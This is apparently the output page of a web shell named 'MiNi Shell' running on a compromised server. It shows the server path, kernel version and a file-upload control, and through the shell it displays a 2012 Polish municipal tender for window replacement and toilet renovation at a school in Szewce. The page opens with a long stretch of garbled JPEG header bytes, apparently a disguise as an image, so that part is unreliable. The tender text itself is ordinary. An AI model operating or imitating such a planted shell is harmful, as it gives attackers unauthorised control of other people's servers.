JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/270338-N-2012.html

<p class="kh_header"><b>Wisznia Mała: Roboty remontowo budowlane w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała</b><br>
<b>Numer ogłoszenia: 270338 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisznia Mała , ul. Wrocławska 9, 55-114 Wisznia Mała, woj. dolnośląskie, tel. 071 3127025, faks 071 3127068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiszniamala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowo budowlane w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot niniejszego zamówienia obejmuje wykonanie robót budowlanych w ramach zadania pn. Roboty remontowo budowlane w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała. 
Przedmiot zamówienia został podzielony na dwa odrębne zadania: 
Zadanie nr 1: Wymiana stolarki okiennej i drzwiowej w zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała. 
Zadanie nr 2: Remont sanitariatów w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała.
  2. Przedmiot zamówienia według kodu CPV: 
Opis zamówienia - kody CPV	
Kod wg CPV 45421000-4 - Roboty w zakresie stolarki budowlanej
Kod wg CPV 45421132-8 - Instalowanie okien	Zadanie nr 1 
kod CPV 45111000-8 - roboty w zakresie burzenia,
kod CPV 45453000-7 - roboty remontowe i renowacyjne
kod CPV 45111300-1 - roboty rozbiórkowe
kod CPV 45310000-3 - roboty instalacyjne elektryczne
kod CPV 45330000-9 - roboty instalacyjne wodno-kanalizacyjne i sanitarne
kod CPV 45232460-4 - roboty instalacyjne w zakresie urządzeń sanitarnych	Zadanie nr 2

3.Szczegółowy opis i zakres robót: 
1. Zadanie nr 1: Wymiana stolarki okiennej i drzwiowej w zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała w następującym zakresie: 
a. Demontaż starej stolarki okiennej, parapetów wewnętrznych ilości 25 szt.  
b. Montaż nowej stolarki okiennej, parapetów z demontażu w ilości 25 szt.  
c. Demontaż stolarki drzwiowej i okiennej - 1 szt. 
d. Montaż stolarki drzwiowej i okiennej - 1 szt. 
e. Obróbki murarskie ościeży. 
f.  Wykonanie badań termowizyjnych potwierdzających poprawność zamontowania okien.  
1.1. Parametry stolarki okiennej: 
 Okna z profili wysokoudarowych PCV pięciokomorowe wzmocnione kształtkami ze stali ocynkowanej o współczynniku przenikania ciepła dla okna k = 1,2 W/m2 K, dla szyby 0,7 W/m2 K. W ramie okiennej nawietrzaki higrosterowane montowane na ramie okiennej, max. strumień przepływu 30/35 m3/godz. przy 10 Pa, w kolorze białym z okapami, tłumienie 33/36 dB(A).
Okucia okienne obwiedniowe umożliwiające sterowanie uchylno - rozwierane za pomocą
klamki, dla elementów uchylanych, w najwyższej części okna sterowanie z poziomu podłogi. Należy zastosować okucia okienne zapewniające stabilność okien. Okucia w oknach stosować kompletne, przystosowane do ciężaru własnego skrzydła i obciążeń eksploatacyjnych, skrzydła uchylne winny być wyposażone w ograniczniki, rozwieralność z możliwością stopniowania uchyłu -minimum 40, klamki w kolorze białym z materiału PCV.
Profile w kolorze białym. Szklenie szkłem bezpiecznym zespolonym potrójnym. Podział okien zgodnie z podziałem istniejącym wskazanym w załączniku do nieniejszej SIWZ. 
Okna wyposażone w uszczelki przylgowe z EPDM na całym obwodzie okien, mocowane do wrębów.

1.2. Parametry stolarki okiennej i drzwiowej: 
Okna i drzwi z profili PCV wzmocnionych kształtkami ze stali ocynkowanej o współczynniku przenikania ciepła k = 1,3 W/m2 K, nawiew z mikrowentylacją, okucia obwiedniowe umożliwiające sterowanie uchylno - rozwierane za pomocą klamki. Profile w kolorze białym. Szklenie szkłem zespolonym podwójnym ( 4 + 4/ 16 float).  
Podział okien i drzwi zgodnie z rysunkiem stanowiącym załącznik do niniejszej SIWZ.  Drzwi w kolorze białym wyposażone w 2 zamki pochwyt, samozamykacz.  

1.3. UWAGA! Zamawiający informuje iż po dokonaniu montażu stolarki okiennej, należy wykonać badania termowizyjne potwierdzające poprawność montażu oraz izolacyjność termiczną okien. Dokumentacja  z badań termowizji musi potwierdzać poprawność osadzenia, szczelność okien  - brak mostków termicznych. W/w dokumentacja będzie stanowiła podstawę do odbioru zadania.      

4. Zadanie nr 2: Remont sanitariatów w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała. Remont pomieszczeń zlokalizowanych na parterze w Zespole Szkolno Przedszkolnym w następującym zakresie: 
1. przebudowa - adaptacja pomieszczenia przebieralni na toaletę dla dzieci przedszkolnych obejmująca: 
- montaż toalety systemowej
- obsadzenie drzwi z ościeżnicami 
- licowanie ścian płytkami 
- montaż sanitariatów dla dzieci 
- montaż opraw oświetleniowych 
2. remont pomieszczeń toalet dla chłopców i dziewczynek obejmujący: 
- demontaż i montaż sanitariatów 
- demontaż i montaż instalacji wod- kan
- demontaż i montaż instalacji oświetlenia  
3. przebudowa pomieszczenia toalety na gabinet lekarski obejmująca: 
-  montaż i demontaż drzwi z ościeżnicami 
- demontaż ścianki działowej 
- wykonanie posadzek 
- licowanie ścian płytkami
- demontaż i montaż instalacji oświetlenia.  
Szczegółowy zakres robót określono w przedmiarze robót. 
Remont pomieszczeń należy wykonać zgodnie z zapisami przedmiaru robót oraz załącznikiem graficznym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.32-8, 45.11.10.00-8, 45.45.30.00-7, 45.11.13.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.23.24.60-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Wykonawca spełnia warunek, jeżeli w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane polegającą na wymianie stolarki okiennej o łącznej wartości robót budowlanych  min. 30 000 PLN brutto każda - Warunek dla zadanie nr 1 

      b. Wykonawca spełnia warunek, jeżeli w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane polegające na wykonaniu robót ogólnobudowlanych o łącznej wartości robót budowlanych  min. 30 000 PLN brutto każda - Warunek dla zadania nr 2,
Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełnienia przedstawionego warunku dla poszczególnych zadań  zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w pkt. 9. Z dokumentów  i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Sporządzony przez wykonawcę Formularz Ofertowy stanowiący załącznik nr 1 do IDW;
b. oświadczenie o spełnianiu warunków udziału w postępowaniu, w zakresie zapisów art. 22 ust. 1 Ustawy Pzp, opisane w punkcie 8 niniejszej IDW, sporządzone według Załącznika nr 2 do IDW, (Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy);
c. Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, przedstawia w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonaniu zamówienia.
d. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp, wymienionych w ust. 2 lub ust. e. Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy Pzp, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty dołączone powinno być pełnomocnictwo w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
f. Każdy z wykonawców występujących wspólnie powinien nie podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp. Każdy z nich powinien złożyć dokumenty w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, jednakże zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje zmianę zawartej Umowy w stosunku do treści oferty Wykonawcy, na podstawie określonych poniżej warunków:
Terminu
Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w przypadku wystąpienia niżej wymienionych okoliczności pod warunkiem, że mają one wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
-   	przestojów i opóźnień zawinionych przez Zamawiającego,
-   	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), 
-   	warunków atmosferycznych uniemożliwiających lub utrudniających wykonywanie robót, 
- 	ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej przeszkody w budynku
W okolicznościach wyżej wymienionych strony ustalają nowe terminy umowne, z tym, że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
Zakresu i wartości umowy
a)	Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub zaniechane - dla zadania nr 2;
b)	Wprowadzenie robót zamiennych jest możliwe jeśli:
- 	jest korzystne dla Zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki w trakcie eksploatacji przedmiotu umowy
- 	stało się konieczne na skutek ujawnienia się przeszkód w gruncie lub w budynku, 
- 	pozwolą  osiągnąć  lepsze  parametry  techniczne,  użytkowe,  estetyczne  od  przyjętych  w dokumentacji projektowej,
- 	dotyczą zastosowania nowych technologii nieznanych Zamawiającemu i niedostępnych w momencie zawarcia umowy.
c)	Wprowadzenie robót zaniechanych jest możliwe jeśli:
- 	konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy
- 	zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
Zmian osób reprezentujących strony umowy bądź danych firmy
a)	W przypadku zmian osób uprawnionych do reprezentowania Zamawiającego lub Wykonawcy strony dokonają stosownych zmian w umowie podobnie ma się w przypadku zmiany danych firmy.
b)	Wartość przedmiotu Umowy nie będzie podlegać waloryzacji ze względu na inflację.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiszniamala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała pok. nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 : Wymiana stolarki okiennej i drzwiowej w zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zadanie nr 1: Wymiana stolarki okiennej i drzwiowej w zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała w następującym zakresie: 
a. Demontaż starej stolarki okiennej, parapetów wewnętrznych ilości 25 szt.  
b. Montaż nowej stolarki okiennej, parapetów z demontażu w ilości 25 szt.  
c. Demontaż stolarki drzwiowej i okiennej - 1 szt. 
d. Montaż stolarki drzwiowej i okiennej - 1 szt. 
e. Obróbki murarskie ościeży. 
f.  Wykonanie badań termowizyjnych potwierdzających poprawność zamontowania okien.  
1.1. Parametry stolarki okiennej: 
 Okna z profili wysokoudarowych PCV pięciokomorowe wzmocnione kształtkami ze stali ocynkowanej o współczynniku przenikania ciepła dla okna k = 1,2 W/m2 K, dla szyby 0,7 W/m2 K. W ramie okiennej nawietrzaki higrosterowane montowane na ramie okiennej, max. strumień przepływu 30/35 m3/godz. przy 10 Pa, w kolorze białym z okapami, tłumienie 33/36 dB(A).
Okucia okienne obwiedniowe umożliwiające sterowanie uchylno - rozwierane za pomocą
klamki, dla elementów uchylanych, w najwyższej części okna sterowanie z poziomu podłogi. Należy zastosować okucia okienne zapewniające stabilność okien. Okucia w oknach stosować kompletne, przystosowane do ciężaru własnego skrzydła i obciążeń eksploatacyjnych, skrzydła uchylne winny być wyposażone w ograniczniki, rozwieralność z możliwością stopniowania uchyłu -minimum 40, klamki w kolorze białym z materiału PCV.
Profile w kolorze białym. Szklenie szkłem bezpiecznym zespolonym potrójnym. Podział okien zgodnie z podziałem istniejącym wskazanym w załączniku do niniejszej SIWZ. Okna wyposażone w uszczelki przylgowe z EPDM na całym obwodzie okien, mocowane do wrębów.

1.2. Parametry stolarki okiennej i drzwiowej: 
Okna i drzwi z profili PCV wzmocnionych kształtkami ze stali ocynkowanej o współczynniku przenikania ciepła k = 1,3 W/m2 K, nawiew z mikrowentylacją, okucia obwiedniowe umożliwiające sterowanie uchylno - rozwierane za pomocą klamki. Profile w kolorze białym. Szklenie szkłem zespolonym podwójnym ( 4 + 4/ 16 float).  
Podział okien i drzwi zgodnie z rysunkiem stanowiącym załącznik do niniejszej SIWZ.  Drzwi w kolorze białym wyposażone w 2 zamki pochwyt, samozamykacz.  

1.3. UWAGA! Zamawiający informuje iż po dokonaniu montażu stolarki okiennej, należy wykonać badania termowizyjne potwierdzające poprawność montażu oraz izolacyjność termiczną okien. Dokumentacja  z badań termowizji musi potwierdzać poprawność osadzenia, szczelność okien  - brak mostków termicznych. W/w dokumentacja będzie stanowiła podstawę do odbioru zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.32-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Remont sanitariatów w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Remont sanitariatów w Zespole Szkolno Przedszkolnym w Szewcach, gmina Wisznia Mała. Remont pomieszczeń zlokalizowanych na parterze w Zespole Szkolno Przedszkolnym w następującym zakresie: 
1. przebudowa - adaptacja pomieszczenia przebieralni na toaletę dla dzieci przedszkolnych obejmująca: 
- montaż toalety systemowej
- obsadzenie drzwi z ościeżnicami 
- licowanie ścian płytkami 
- montaż sanitariatów dla dzieci 
- montaż opraw oświetleniowych 
2. remont pomieszczeń toalet dla chłopców i dziewczynek obejmujący: 
- demontaż i montaż sanitariatów 
- demontaż i montaż instalacji wod- kan
- demontaż i montaż instalacji oświetlenia  
3. przebudowa pomieszczenia toalety na gabinet lekarski obejmująca: 
-  montaż i demontaż drzwi z ościeżnicami 
- demontaż ścianki działowej 
- wykonanie posadzek 
- licowanie ścian płytkami
- demontaż i montaż instalacji oświetlenia.  
Szczegółowy zakres robót określono w przedmiarze robót. 
Remont pomieszczeń należy wykonać zgodnie z zapisami przedmiaru robót oraz załącznikiem graficznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.45.30.00-7, 45.11.13.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.23.24.60-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com